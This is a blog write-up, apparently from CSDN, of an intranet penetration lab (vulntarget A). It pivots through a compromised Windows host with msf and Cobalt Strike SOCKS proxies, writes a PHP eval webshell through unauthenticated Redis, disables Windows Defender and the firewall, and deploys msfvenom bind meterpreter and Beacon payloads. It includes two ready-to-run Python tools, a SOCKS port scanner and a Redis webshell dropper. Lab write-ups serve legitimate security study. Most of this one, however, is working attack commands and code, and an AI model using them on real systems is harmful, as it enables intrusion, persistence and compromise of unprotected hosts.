Intranet security: Intranet penetration. (Obtaining the highest privileges on the intranet hosts, vulntarget lab A)

Intranet security: Intranet penetration. (Obtaining the highest privileges on the intranet hosts)

Intranet penetration here means reaching hosts on private (NAT'd) networks that are not directly routable from the attacker. With NAT traversal (port mapping), a port of an internal host is published on the gateway's public address so that a machine on the outside can reach a machine on the inside: the gateway translates the public address:port pair into the private one. In the usual setup a client runs on any PC or server inside the LAN; a domain name resolves to the public IP at the LAN's gateway exit, and a port mapping on that gateway forwards the traffic to the listening device. In this write-up the same idea is applied from the attacker's side: a compromised edge host is used as a pivot (routes and a SOCKS proxy) into the next network segment.


Table of contents:

Intranet security: Intranet penetration. (Obtain the highest authority of the intranet host)

The network environment:

Host information:

Intranet penetration testing:

(1) Intranet host detection:

(2) Build the channel:

(3) Intranet scanning:

(4) Intranet penetration:

(5) Online MSF:

(6) Online CS:


Disclaimer:

It is strictly forbidden to use the virtual machines and techniques described in this article for any form of attack; otherwise the consequences are at your own risk, and the uploader bears no responsibility.


The network environment:


Host information (192.168.0.0/24 plays the role of the "extranet"; the win 7 and win 2016 hosts are dual-homed and form the pivots into the two intranet tiers):

host       Extranet         Intranet 1      Intranet 2
kali       192.168.0.101    -               -
win 7      192.168.0.102    10.0.20.98      -
win 2016   -                10.0.20.99      10.0.10.111
win 2019   -                -               10.0.10.110

The previous stage (compromising the web server, which yields the first shell on win 7): Web security: getting the highest privileges on the web server (vulntarget lab 1), Half a watermelon's blog on CSDN.


Intranet penetration testing:

(1) Intranet host detection:

shell ipconfig            // (CS Beacon) show the NICs of the first pivot and the subnet of its second interface

Host discovery and port scanning on that segment (10.0.20.x).

One intranet host was found, IP 10.0.20.99


(2) Build the channel:

Proxy forwarding [msf proxy]

run post/multi/manage/autoroute            // add a route to the second-tier segment through the current session

run autoroute -p                           // print the routing table


Proxy forwarding [CS proxy]

Check the proxy information (the local SOCKS port the Beacon's socks proxy, or the msf socks module, is listening on).

Edit the /etc/proxychains4.conf file so that its last line points at that proxy (a socks4 or socks5 line with 127.0.0.1 and the port shown; the type must match what the proxy speaks).

vim /etc/proxychains4.conf        // open the file


(3) Intranet scanning:

Browser proxy configuration: point the browser's SOCKS proxy at the same port to reach web services on the second tier.

Access port 6379 (the Redis service) on the second-tier intranet host through the proxy:

proxychains4 redis-cli -h 10.0.20.99

proxychains4 redis-cli -h [IP address of the second-tier intranet host]
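What proxychains does for each of the commands above, as an added example that is not part of the original post: a SOCKS4 CONNECT handshake, the protocol spoken to the msf/CS socks proxy, used here to check which of the lab's ports are open on the second-tier host before touching Redis. Assumed (not from the post): the proxy listens on 127.0.0.1:1080, the target and the port list are taken from the host table.

```python
import socket
import struct

PROXY = ("127.0.0.1", 1080)     # assumption: local SOCKS4 port opened by CS `socks 1080` or the msf socks module
TARGET = "10.0.20.99"           # second-tier host from the host table
LAB_PORTS = [80, 445, 3389, 6379]   # web, SMB, RDP, Redis

SOCKS4_VERSION, SOCKS4_CMD_CONNECT = 4, 1
SOCKS4_STATUS = {0x5A: "granted", 0x5B: "rejected or failed",
                 0x5C: "identd unreachable", 0x5D: "identd user mismatch"}


def socks4_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """Request layout: VN=4 | CD=1 | DSTPORT (2 bytes, big-endian) | DSTIP (4 bytes) | USERID | NUL."""
    return (struct.pack("!BBH", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, port)
            + socket.inet_aton(host) + userid + b"\x00")


def socks4_reply_status(reply: bytes) -> str:
    """Decode the 8-byte reply: VN=0 | CD | DSTPORT | DSTIP. CD=0x5A means the proxy reached the target."""
    if len(reply) < 8:
        return "short or empty reply"
    return SOCKS4_STATUS.get(reply[1], "unknown status 0x%02x" % reply[1])


def socks4_reply_granted(reply: bytes) -> bool:
    return socks4_reply_status(reply) == "granted"


def check_port(host: str, port: int, proxy=PROXY, timeout: float = 3.0) -> bool:
    """True if host:port accepted a TCP connection that the proxy made on our behalf."""
    try:
        with socket.create_connection(proxy, timeout=timeout) as sock:
            sock.sendall(socks4_connect_request(host, port))
            return socks4_reply_granted(sock.recv(8))
    except OSError:   # proxy down, no route through the pivot, or target unreachable
        return False


def scan(host: str, ports=LAB_PORTS, proxy=PROXY):
    """Open ports on host; each port is one SOCKS CONNECT, exactly as proxychains does per connection."""
    return [p for p in ports if check_port(host, p, proxy)]


if __name__ == "__main__":
    print(TARGET, scan(TARGET))
```

Only TCP connects go through a SOCKS proxy, which is why ICMP ping sweeps and UDP scans through proxychains show nothing; use connect scans. Recent msf versions start auxiliary/server/socks_proxy as SOCKS5 by default, so either set VERSION 4a there or change this client and the proxychains line accordingly.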


(4) Intranet penetration:

Exploiting Redis unauthorized access.
Because 10.0.20.99 also runs a web service, we write a webshell through the unauthenticated Redis instance. For that we
need the site's absolute path (the web root), and the Redis process must have write permission to it.

Method one:
Probe for files that may leak sensitive information, for example /phpinfo.php (directory scanning and similar methods help here);
phpinfo shows DOCUMENT_ROOT, which is the path we need.
(Default phpStudy web root on Windows: C:\phpStudy\PHPTutorial\www\)

Method two:
If the web root is not the default, change the target path instead: use Redis to write a bat script into a Startup folder (the path and the user name have to be guessed),
so that it runs automatically when that user logs on and brings the host online or spawns a reverse shell.

So we write the webshell (a PHP one-liner):
(1)proxychains4 redis-cli -h 10.0.20.99        // connect to the Redis service through the proxy

(2)config set dir "C:/phpStudy/PHPTutorial/www/"    
//point the dump directory at the web root so the script lands there (C:/phpStudy/PHPTutorial/www/ is the Windows default)

(3)config set dbfilename bgxg.php                //the dump file name becomes the script name, bgxg.php

(4)set 1 "<?php @eval($_POST['bgxg']);?>"        //the script content (PHP one-liner webshell)

(5)save                                          //write the RDB dump, and with it the one-liner, to disk

The saved file is an RDB dump with binary bytes around the PHP tag; PHP echoes everything outside <?php ... ?> as-is and executes only the tag, so the junk does not matter. An error on step (2) means the directory does not exist or Redis cannot write there.
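The five redis-cli steps as a RESP exchange, added here as an example (it is not code from the original post) so that the protocol is visible: it first checks that the instance answers PING without authentication, then sends the same CONFIG SET / SET / SAVE sequence and returns every reply. Assumed: the target, web root and script name from the steps above; run it with proxychains4 from the Kali box, or on a host that can route to 10.0.20.99.

```python
import socket

TARGET = ("10.0.20.99", 6379)                 # second-tier host from the host table
WEB_ROOT = "C:/phpStudy/PHPTutorial/www/"     # phpStudy default web root, as on the page
SHELL_NAME = "bgxg.php"
SHELL_BODY = "<?php @eval($_POST['bgxg']);?>"


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings, exactly what redis-cli sends."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def resp_decode(data: bytes):
    """Decode one reply into (kind, value): status (+OK), error (-ERR ...), integer (:1) or bulk ($4\\r\\nPONG)."""
    head, _, rest = data.partition(b"\r\n")
    kind, body = head[:1], head[1:].decode()
    if kind == b"+":
        return ("status", body)
    if kind == b"-":
        return ("error", body)
    if kind == b":":
        return ("integer", int(body))
    if kind == b"$":
        length = int(body)
        return ("bulk", None if length < 0 else rest[:length].decode())
    raise ValueError("unsupported reply: %r" % data[:32])


def webshell_commands(web_root=WEB_ROOT, name=SHELL_NAME, body=SHELL_BODY):
    """Steps (2)-(5) of the write-up as argument tuples."""
    return [
        ("CONFIG", "SET", "dir", web_root),       # dump directory -> web root
        ("CONFIG", "SET", "dbfilename", name),    # dump file name -> script name
        ("SET", "1", body),                       # the one-liner ends up inside the dump
        ("SAVE",),                                # write the RDB file to disk
    ]


def send(sock, *args):
    sock.sendall(resp_encode(*args))
    return resp_decode(sock.recv(4096))


def is_unauthenticated(sock) -> bool:
    """True when PING is answered with +PONG; a protected instance replies -NOAUTH instead."""
    kind, value = send(sock, "PING")
    return kind == "status" and value == "PONG"


def drop_webshell(target=TARGET, timeout=5.0):
    """Run the full sequence; returns the list of replies, or None if AUTH is required."""
    with socket.create_connection(target, timeout=timeout) as sock:
        if not is_unauthenticated(sock):
            return None
        return [send(sock, *cmd) for cmd in webshell_commands()]


if __name__ == "__main__":
    print(drop_webshell())
```

Every reply should come back as ("status", "OK"); an ("error", ...) on the first CONFIG SET means the directory is wrong or not writable, and on hardened instances CONFIG itself is renamed or disabled, which is the usual fix for this class of bug.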

Uploading the trojan requires Windows Defender to be turned off (run from an elevated shell; newer Windows 10/11 builds no longer honor this value, but it still applies to older builds and to Server 2016 as used here):

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

gpupdate /force

Uploading the trojan also requires the firewall to be turned off (a bind payload needs its inbound port reachable):

(1)Netsh advfirewall show allprofiles        // show the firewall configuration for all profiles

(2)netSh advfirewall set allprofiles state off        // turn the firewall off for all profiles


(5) Online MSF:

Penetrating the second-tier intranet [msf proxy]
run post/multi/manage/autoroute            // add a route through the first session

run autoroute -p                           // print the routing table

background                                 // background the session

Generate a new program (trojan) for the second-tier intranet. The second-tier host has no route back to 192.168.0.101, so a bind payload is used and msf connects to it through the route just added:

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.0.101 LPORT=12345 -f exe > 12345.exe

use exploit/multi/handler                      // the handler that connects to the bind payload
set payload windows/meterpreter/bind_tcp       // set the payload

set lport 12345                                // the port the trojan listens on

set rhost 10.0.20.99                           // the second-tier target host

run                                            // connect to the listening trojan through the pivot route

Upload the program (trojan) to the second-tier host with AntSword (蚁剑) and execute it there before running the handler, so that port 12345 is already listening.


(6) Online CS:

Create a Beacon TCP listener (a bind-style listener, since the second tier cannot call back to the team server directly).

Generate a new program (trojan) from that listener (to be used against the other hosts of the second-tier intranet).

Upload the program (trojan) with AntSword (蚁剑) and run it on the target.

Then link to it from the first-tier Beacon:

connect 10.0.20.99 666

connect [IP address of the second-tier intranet host] [port of the trojan]


Origin blog.csdn.net/weixin_54977781/article/details/131030577